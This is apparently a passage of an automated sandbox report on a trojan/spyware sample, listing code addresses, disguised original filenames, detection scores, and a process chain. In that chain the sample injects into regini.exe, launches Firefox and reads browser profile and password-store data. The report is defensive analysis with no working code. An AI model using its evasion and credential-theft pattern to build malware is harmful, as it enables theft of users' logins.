                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_00939550 NtReadFile,13_2_00939550
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_009396E0 NtClose,13_2_009396E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_00939640 NtDeleteFile,13_2_00939640
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_00939850 NtAllocateVirtualMemory,13_2_00939850
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0327F149 NtReadVirtualMemory,13_2_0327F149
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0327F0E6 NtReadVirtualMemory,13_2_0327F0E6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0327F795 NtClose,13_2_0327F795
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 0_2_02A5DE840_2_02A5DE84
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 0_2_07188C680_2_07188C68
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 0_2_0718D3180_2_0718D318
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 0_2_0718E1000_2_0718E100
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 0_2_0718C0780_2_0718C078
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 0_2_07188C580_2_07188C58
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 0_2_0718DBF00_2_0718DBF0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 0_2_071911FC0_2_071911FC
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 0_2_071989300_2_07198930
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 0_2_0719CD480_2_0719CD48
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 0_2_07192A900_2_07192A90
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 0_2_076615300_2_07661530
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_004188E311_2_004188E3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0041010311_2_00410103
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_00402A7211_2_00402A72
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_00416ADE11_2_00416ADE
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_00416AE311_2_00416AE3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_00402A8011_2_00402A80
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0040E30311_2_0040E303
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0041032311_2_00410323
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0040E44711_2_0040E447
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0040E45311_2_0040E453
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0040256A11_2_0040256A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0040257011_2_00402570
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0042EED311_2_0042EED3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_00402F5011_2_00402F50
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0153815811_2_01538158
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A010011_2_014A0100
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154A11811_2_0154A118
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015681CC11_2_015681CC
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015641A211_2_015641A2
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015701AA11_2_015701AA
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154200011_2_01542000
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156A35211_2_0156A352
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015703E611_2_015703E6
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014BE3F011_2_014BE3F0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0155027411_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015302C011_2_015302C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B053511_2_014B0535
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0157059111_2_01570591
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156244611_2_01562446
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0155442011_2_01554420
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0155E4F611_2_0155E4F6
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D475011_2_014D4750
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B077011_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AC7C011_2_014AC7C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CC6E011_2_014CC6E0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C696211_2_014C6962
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B29A011_2_014B29A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0157A9A611_2_0157A9A6
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014BA84011_2_014BA840
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B284011_2_014B2840
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE8F011_2_014DE8F0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014968B811_2_014968B8
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156AB4011_2_0156AB40
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01566BD711_2_01566BD7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AEA8011_2_014AEA80
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014BAD0011_2_014BAD00
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154CD1F11_2_0154CD1F
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AADE011_2_014AADE0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C8DBF11_2_014C8DBF
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0C0011_2_014B0C00
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A0CF211_2_014A0CF2
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550CB511_2_01550CB5
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01524F4011_2_01524F40
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01552F3011_2_01552F30
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014F2F2811_2_014F2F28
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D0F3011_2_014D0F30
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A2FC811_2_014A2FC8
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014BCFE011_2_014BCFE0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152EFA011_2_0152EFA0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0E5911_2_014B0E59
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156EE2611_2_0156EE26
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156EEDB11_2_0156EEDB
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156CE9311_2_0156CE93
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C2E9011_2_014C2E90
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E516C11_2_014E516C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149F17211_2_0149F172
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0157B16B11_2_0157B16B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014BB1B011_2_014BB1B0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B70C011_2_014B70C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0155F0CC11_2_0155F0CC
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156F0E011_2_0156F0E0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015670E911_2_015670E9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149D34C11_2_0149D34C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156132D11_2_0156132D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014F739A11_2_014F739A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CB2C011_2_014CB2C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015512ED11_2_015512ED
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B52A011_2_014B52A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156757111_2_01567571
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154D5B011_2_0154D5B0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A146011_2_014A1460
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156F43F11_2_0156F43F
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156F7B011_2_0156F7B0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015616CC11_2_015616CC
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B995011_2_014B9950
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CB95011_2_014CB950
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154591011_2_01545910
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151D80011_2_0151D800
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B38E011_2_014B38E0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156FB7611_2_0156FB76
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01525BF011_2_01525BF0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014EDBF911_2_014EDBF9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CFB8011_2_014CFB80
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01567A4611_2_01567A46
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156FA4911_2_0156FA49
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01523A6C11_2_01523A6C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0155DAC611_2_0155DAC6
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014F5AA011_2_014F5AA0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01551AA311_2_01551AA3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154DAAC11_2_0154DAAC
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B3D4011_2_014B3D40
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01561D5A11_2_01561D5A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01567D7311_2_01567D73
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CFDC011_2_014CFDC0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01529C3211_2_01529C32
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156FCF211_2_0156FCF2
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156FF0911_2_0156FF09
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B1F9211_2_014B1F92
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156FFB111_2_0156FFB1
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B9EB011_2_014B9EB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353A35213_2_0353A352
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_035403E613_2_035403E6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0348E3F013_2_0348E3F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0352027413_2_03520274
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_035002C013_2_035002C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0350815813_2_03508158
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0347010013_2_03470100
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0351A11813_2_0351A118
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_035381CC13_2_035381CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_035341A213_2_035341A2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_035401AA13_2_035401AA
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0351200013_2_03512000
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034A475013_2_034A4750
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0348077013_2_03480770
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0347C7C013_2_0347C7C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0349C6E013_2_0349C6E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0348053513_2_03480535
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0354059113_2_03540591
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353244613_2_03532446
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0352442013_2_03524420
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0352E4F613_2_0352E4F6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353AB4013_2_0353AB40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03536BD713_2_03536BD7
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0347EA8013_2_0347EA80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0349696213_2_03496962
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034829A013_2_034829A0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0354A9A613_2_0354A9A6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0348A84013_2_0348A840
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0348284013_2_03482840
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034AE8F013_2_034AE8F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034668B813_2_034668B8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034F4F4013_2_034F4F40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03522F3013_2_03522F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034C2F2813_2_034C2F28
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034A0F3013_2_034A0F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03472FC813_2_03472FC8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0348CFE013_2_0348CFE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034FEFA013_2_034FEFA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03480E5913_2_03480E59
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353EE2613_2_0353EE26
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353EEDB13_2_0353EEDB
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353CE9313_2_0353CE93
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03492E9013_2_03492E90
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0348AD0013_2_0348AD00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0351CD1F13_2_0351CD1F
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0347ADE013_2_0347ADE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03498DBF13_2_03498DBF
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03480C0013_2_03480C00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03470CF213_2_03470CF2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03520CB513_2_03520CB5
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0346D34C13_2_0346D34C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353132D13_2_0353132D
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034C739A13_2_034C739A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0349B2C013_2_0349B2C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_035212ED13_2_035212ED
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034852A013_2_034852A0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B516C13_2_034B516C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0346F17213_2_0346F172
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0354B16B13_2_0354B16B
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0348B1B013_2_0348B1B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034870C013_2_034870C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0352F0CC13_2_0352F0CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353F0E013_2_0353F0E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_035370E913_2_035370E9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353F7B013_2_0353F7B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_035316CC13_2_035316CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353757113_2_03537571
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0351D5B013_2_0351D5B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0347146013_2_03471460
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353F43F13_2_0353F43F
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353FB7613_2_0353FB76
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034BDBF913_2_034BDBF9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034F5BF013_2_034F5BF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0349FB8013_2_0349FB80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03537A4613_2_03537A46
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353FA4913_2_0353FA49
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034F3A6C13_2_034F3A6C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0352DAC613_2_0352DAC6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034C5AA013_2_034C5AA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03521AA313_2_03521AA3
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0351DAAC13_2_0351DAAC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0348995013_2_03489950
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0349B95013_2_0349B950
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0351591013_2_03515910
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034ED80013_2_034ED800
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034838E013_2_034838E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353FF0913_2_0353FF09
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03481F9213_2_03481F92
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353FFB113_2_0353FFB1
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03489EB013_2_03489EB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03483D4013_2_03483D40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03531D5A13_2_03531D5A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03537D7313_2_03537D73
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0349FDC013_2_0349FDC0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034F9C3213_2_034F9C32
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353FCF213_2_0353FCF2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0092204013_2_00922040
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0091CF1013_2_0091CF10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0091B11013_2_0091B110
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0091D13013_2_0091D130
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0091B25413_2_0091B254
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0091B26013_2_0091B260
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_009256F013_2_009256F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_009238F013_2_009238F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_009238EB13_2_009238EB
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0093BCE013_2_0093BCE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0327E27713_2_0327E277
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0327E60C13_2_0327E60C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0327D6D813_2_0327D6D8
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 034EEA12 appears 86 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 034C7E54 appears 102 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 0346B970 appears 277 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 034B5130 appears 58 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 034FF290 appears 105 times
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: String function: 0151EA12 appears 86 times
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: String function: 014F7E54 appears 102 times
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: String function: 014E5130 appears 58 times
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: String function: 0152F290 appears 105 times
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: String function: 0149B970 appears 277 times
                Source: ZcshRk2lgh.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: ZcshRk2lgh.exe, 00000000.00000002.1451489861.0000000007270000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs ZcshRk2lgh.exe
                Source: ZcshRk2lgh.exe, 00000000.00000000.1241813422.0000000000892000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUHKn.exe4 vs ZcshRk2lgh.exe
                Source: ZcshRk2lgh.exe, 00000000.00000002.1451050484.0000000007150000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs ZcshRk2lgh.exe
                Source: ZcshRk2lgh.exe, 00000000.00000002.1447440330.0000000002C8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs ZcshRk2lgh.exe
                Source: ZcshRk2lgh.exe, 00000000.00000002.1446351787.0000000000F2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ZcshRk2lgh.exe
                Source: ZcshRk2lgh.exe, 0000000B.00000002.1633636676.000000000159D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ZcshRk2lgh.exe
                Source: ZcshRk2lgh.exe, 0000000B.00000002.1633300230.0000000000F47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameREGINI.EXEj% vs ZcshRk2lgh.exe
                Source: ZcshRk2lgh.exeBinary or memory string: OriginalFilenameUHKn.exe4 vs ZcshRk2lgh.exe
                Source: ZcshRk2lgh.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: ZcshRk2lgh.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@10/10
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZcshRk2lgh.exe.logJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\regini.exeFile created: C:\Users\user~1\AppData\Local\Temp\7046-nn1KJump to behavior
                Source: ZcshRk2lgh.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ZcshRk2lgh.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: regini.exe, 0000000D.00000002.3092940507.0000000002F57000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000D.00000003.1827582447.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000D.00000002.3092940507.0000000002F85000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000D.00000003.1825314812.0000000002F57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: ZcshRk2lgh.exeReversingLabs: Detection: 63%
                Source: ZcshRk2lgh.exeVirustotal: Detection: 71%
                Source: unknownProcess created: C:\Users\user\Desktop\ZcshRk2lgh.exe "C:\Users\user\Desktop\ZcshRk2lgh.exe"
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess created: C:\Users\user\Desktop\ZcshRk2lgh.exe "C:\Users\user\Desktop\ZcshRk2lgh.exe"
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess created: C:\Users\user\Desktop\ZcshRk2lgh.exe "C:\Users\user\Desktop\ZcshRk2lgh.exe"Jump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: apphelp.dllJump to behavior
